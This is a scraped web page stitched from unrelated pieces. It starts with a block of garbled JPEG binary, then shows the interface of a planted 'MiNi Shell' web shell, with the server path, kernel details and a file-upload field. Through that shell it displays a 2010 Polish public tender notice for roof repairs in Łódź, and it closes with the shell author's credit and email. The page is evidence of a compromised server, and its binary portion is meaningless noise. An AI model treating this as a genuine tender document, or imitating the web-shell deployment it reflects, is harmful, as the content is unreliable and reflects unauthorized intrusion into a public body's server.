JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100923/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100923/261387-N-2010.html

<p class="kh_header"><b>Łódź: Remonty dachów w administrowanych nieruchomosciach</b><br>
<b>Numer ogłoszenia: 261387 - 2010; data zamieszczenia: 23.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Administracja Nieruchomościami Łódź-Górna "Wschód" , ul. Lubelska 9/11/8, 93-129 Łódź, woj. łódzkie, tel. 042 6847601, faks 042 6847576.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wschod.com3.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remonty dachów w administrowanych nieruchomosciach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1/ Przedmiotem zamówienia jest wykonanie robót budowlanych - dekarskich oraz 
    towarzyszących w nieruchomościach administrowanych przez Zamawiającego 
    ujętych w pięciu częściach (zadaniach):
    część I - zadanie nr 1 (zał. do SIWZ nr 1); 
    ul. Senatorska 5 - budynek mieszkalny frontowy, 
    część II - zadanie nr 2 (zał. do SIWZ nr 1a); 
    ul. Krzywa 2 - budynek mieszkalny frontowy,
    część III - zadanie nr 3 (zał. do SIWZ nr 1b); 
    ul. Mazurska 21  - pawilon handlowo-usługowy,
    część IV - zadanie nr 4 (zał. do SIWZ nr 1c); 
    ul. Dąbrowskiego 69A  - pawilon handlowo-usługowy,
    część V - zadanie nr 5 (zał. do SIWZ nr 1d); 
    ul. Senatorska 19  - budynek mieszkalny frontowy  oraz część prawej oficyny budynku      
     mieszkalnego od strony ul. Grabowej,

    zgodnie z dokumentacją techniczną, która stanowi załączniki do   
    Specyfikacji Istotnych Warunków Zamówienia, tj: Specyfikacją Techniczną 
    Wykonania i Odbioru Robót - zał. nr 2 oraz dokumentacją obejmującą ilości robót 
    ujęte w przedmiarach robót - zał. nr 1, 1a, 1b, 1c, 1d,  w zakresie:
a) wykonania robót towarzyszących i tymczasowych:
-	zajęcie pasa chodnika - ustawienie słupków ograniczających z liną, po zakończeniu robót rozebrania ustawionych słupków;  
b)  wykonania robót rozbiórkowych:
-	rozebranie pokrycia z papy dachów;
-	rozebranie obróbek blacharskich, rynien i rur spustowych;
-	rozebranie deskowania fragmentów dachów;
-	rozebranie kominów do przemurowania;
c) wykonania robót naprawczo - remontowych:
-	przemurowanie kominów wieloprzewodowych z cegły pełnej ponad dachem  
     z ich otynkowaniem;
-	wykonanie deskowania więźby dachowej;
-	wykonanie obróbek blacharskich z blachy stalowej ocynkowanej o grubości min. 0,55-0,6 mm;
-	wykonanie pokrycia dachów z materiału pokryciowego o następujących min.  parametrach: 
 papa modyfikowana z masy asfaltowej typu SBS, grubość mim: 4,7 mm, 
gramatura 200  g/m2, siła zrywajaca wzdłuż 700 N/5 cm, siła zrywająca w 
           poprzek 500 N/5 cm, elastyczna nawet w niskich temperaturach, wysokiej 
           jakości, odporna na korozję biologiczną, posiadająca bardzo dobre 
          parametry fizyko - mechaniczne.
-	odtworzenie rynien z blachy stalowej ocynkowanej o grubości 
     min. 0,6-07 mm;
-	uzupełnienie rur spustowych z blachy stalowej ocynkowanej o grubości 
     min. 0,6-07 mm;
-	uprzątnięcie terenu po wykonanych robotach wraz z wywozem gruzu, papy i rumowia na wysypisko;
2/ W ramach zamówienia Wykonawca zobowiązany będzie do wykonania robót 
    zgodnie z wytycznymi zawartymi w dokumentacji technicznej. 
3/  Zamawiający w przedmiocie zamówienia będzie wymagał od Wykonawcy:
a)	prowadzenia robót budowlanych pod ścisłym nadzorem osób uprawnionych, posiadajacych uprawnienia budowlane w odpowiedniej specjalności i przy udziale inspektorów nadzoru inwestorskiego wyznaczonych przez Zamawiającego;  
b)	stosowania materiałów i wyrobów dopuszczonych do obrotu i stosowania w budownictwie;
c)	okresu gwarancyjnego - min 120 miesięcy od daty odbioru robót;
d)	zobowiązania się do świadczenia usług w zakresie: odśnieżania dachów i  usuwania zanieczyszczeń z połaci dachowych objętych przedmiotowym zamówieniem w okresie gwarancji, na dodatkowe zlecenie za odrębnym wynagrodzeniem obliczonym na podstawie każdorazowo wynegocjowanej stawki;  
e)	odpowiedzialności za przestrzeganie przepisów bezpieczeństwa i higieny pracy określonymi  w Rozporządzeniu Ministra Infrastruktury z dnia 06.02.2003 r., w sprawie bezpieczeństwa i higieny pracy podczas wykonywania robót budowlanych (Dz. U. nr 47 poz. 401);
f)	odpowiedzialności za jakość wykonania robót oraz ich zgodność 
     z dokumentacją;
g)	odpowiedzialności za przestrzeganie przepisów w zakresie p.poż; 
h)	odpowiedzialności za całość szkód powstałych na skutek prowadzonych robót;
i)	przestrzegania praw osób trzecich, gdyż wszelkie spory z tego wynikające mogą być rozstrzygane na drodze sądowej w Sądach Powszechnych;.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.26.00.00-7, 45.26.10.00-4, 45.26.20.00-1, 45.40.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1/ W celu potwierdzenia spełnienia warunku udziału w postępowaniu określonego 
    w art. 22 ust. 1 Ustawy, który dotyczy: 
a) posiadania wiedzy i doświadczenia;
    Wykazu robót budowlanych (zał. Nr 4 do niniejszej SIWZ) wykonanych  w 
    okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres 
    prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim 
    rodzajem robotom budowlanym  stanowiącym przedmiot zamówienia, z podaniem 
    ich wartości, przedmiotu, dat wykonania i odbiorców, oraz  załączeniem 
    dokumentów potwierdzających, że wykazane roboty zostały wykonane zgodnie z 
    zasadami sztuki budowlanej i prawidłowo ukończone, w następującej ilości: 
- dla części I (zadania nr 1) - min. jednej roboty na kwotę: 30 000,00 zł. brutto,
- dla części II (zadania nr 2) - min. jednej roboty na kwotę: 20 000,00 zł. brutto,
- dla części III (zadania nr 3) - min. jednej roboty na kwotę: 50 000,00 zł. brutto,
- dla części IV (zadania nr 4) - min. jednej roboty na kwotę: 20 000,00 zł. brutto,    
- dla części V (zadania nr 5) - min. jednej roboty na kwotę: 50 000,00 zł. brutto,
    w przypadku składania oferty na wszystkie pięć części zamówienia (zadania) co 
    najmniej: pięciu robót na kwotę: min. 170.000,00 zł. brutto.
    Ocena spełnienia opisanego warunku nastąpi na podstawie przedstawionych przez 
    Wykonawców dokumentów i oświadczeń  na zasadzie (spełnia/nie spełnia).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1/ W celu potwierdzenia spełnienia warunku udziału w postępowaniu określonego 
    w art. 22 ust. 1 Ustawy, który dotyczy:
a) dysponowania potencjałem technicznym; 
     Oświadczenia (zał. nr 7 do niniejszej SIWZ), że Wykonawca dysponuje
     potencjałem technicznym gwarantującym terminowe i jakościowo dobre wykonanie 
     robót - zgodne z wymogami technologicznymi dla prowadzenia robót objętych 
     przedmiotowym zamówieniem.    
    Ocena spełnienia opisanego warunku nastąpi na podstawie przedstawionych przez 
    Wykonawców oświadczeń  na zasadzie (spełnia/nie spełnia).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1/ W celu potwierdzenia spełnienia warunku udziału w postępowaniu określonego 
    w art. 22 ust. 1 Ustawy, który dotyczy:
a) dysponowania osobami zdolnymi do wykonania zamówienia;
    Wykazu osób (zał. nr 5 do niniejszej SIWZ), które będą uczestniczyć w 
    wykonywaniu zamówienia w szczególności odpowiedzialnych za kierowanie 
    robotami budowlanymi, wraz  z informacjami na temat ich kwalifikacji 
    zawodowych, doświadczenia, a także zakresu wykonywanych przez nie czynności , 
    oraz informacją o podstawie do dysponowania tymi osobami. Wykonawcy winni 
    wykazać, że dla zapewnienia należytego wykonania zamówienia dysponują 
    min. czterema osobami w zawodach: murarz - tynkarz, dekarz. 
     Oświadczenia (zał. Nr 6 do niniejszej SIWZ), że Wykonawca lub osoba, która 
     będzie uczestniczyć w wykonywaniu zamówienia pełniąca na rzecz Wykonawcy 
     obowiązki kierownika robót (usługi nadzoru nad prowadzonymi robotami) posiada      
     wymagane uprawnienia budowlane w specjalności: konstrukcyjno - budowlanej 
    (wykonawcze), zgodne z art. 12, 13, i 14 ustawy z dnia 07.07.1994 r. Prawo 
     Budowlane z późniejszymi zmianami oraz ważne zaświadczenie o przynależnosci do 
    Okręgowej Izby Inżynierów Budownictwa    
    Ocena spełnienia opisanych warunków nastąpi na podstawie przedstawionych przez 
    Wykonawców dokumentów i oświadczeń na zasadzie (spełnia/nie spełnia).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1/W zakresie potwierdzenia spełnienia warunku udziału w postępowaniu określonego 
    w art. 22 ust. 1 Ustawy, który dotyczy:
a) sytuacji ekonomicznej i finansowej;
    Opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzajacego, że 
    Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie 
     prowadzonej działalności związanej z przedmiotem zamówienia  na sumę 
    ubezpieczenia nie mniej niż 100.000,00 zł. niezależnie od ilości części zamówienia     
    (zadań) do których przystępuje Wykonawca. W przypadku załączenia dokumentu na 
    okres krótszy od terminu zamówienia, do oferty należy dołączyć pisemne 
    zobowiązanie o przedłużeniu ważności ubezpieczenia.      
    Ocena spełnienia opisanego warunku nastąpi na podstawie przedstawionych przez 
    Wykonawcę dokumentów i oświadczeń na zasadzie (spełnia/nie spełnia).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wschod.com3.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> A. N. Łódź - Górna Wschód 93-129 Łódź ul. Lubelska 9/11 pok. 31, w cenie 20,00 zł. brutto.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.10.2010 godzina 10:00, miejsce: A. N. Łódź - Górna Wschód 93-129 Łódź ul. Lubelska 9/11 pok. 31.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com